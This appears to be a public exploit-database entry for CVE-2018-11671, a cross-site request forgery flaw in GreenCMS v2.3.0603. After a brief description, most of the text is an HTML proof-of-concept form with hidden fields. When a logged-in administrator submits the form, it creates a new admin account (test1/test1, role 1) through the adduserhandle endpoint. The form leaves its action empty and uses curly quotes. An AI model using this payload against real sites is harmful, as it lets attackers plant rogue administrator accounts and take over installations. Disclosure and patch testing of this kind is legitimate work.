GreenCMS 2.3.0603 – Cross-Site Request Forgery (Add Admin)

# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability add admin
# Date: 2018-06-02
# Exploit Author: xichao
# Vendor Homepage:
# Software Link:
# Version: v2.3.0603
# CVE : CVE-2018-11671

An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that can add an admin account via index.php?m=admin&c=access&a=adduserhandle.


<span style=”font-size:18px;”><!DOCTYPE html>
<html lang=”en”>
<meta charset=”UTF-8″>
<form action=”” method=”POST” id=”transfer” name=”transfer”>
<input type=”hidden” name=”user_id0″ value=”1″>
<input type=”hidden” name=”user_login” value=”test1″>
<input type=”hidden” name=”password” value=”test1″>
<input type=”hidden” name=”rpassword” value=”test1″>
<input type=”hidden” name=”user_nicename” value=”123″>
<input type=”hidden” name=”user_email” value=””>
<input type=”hidden” name=”user_url” value=””>
<input type=”hidden” name=”user_intro” value=”test”>
<input type=”hidden” name=”user_status” value=”1″>
<input type=”hidden” name=”role_id” value=”1″>
<button type=”submit” value=”Submit”>add admin</button>


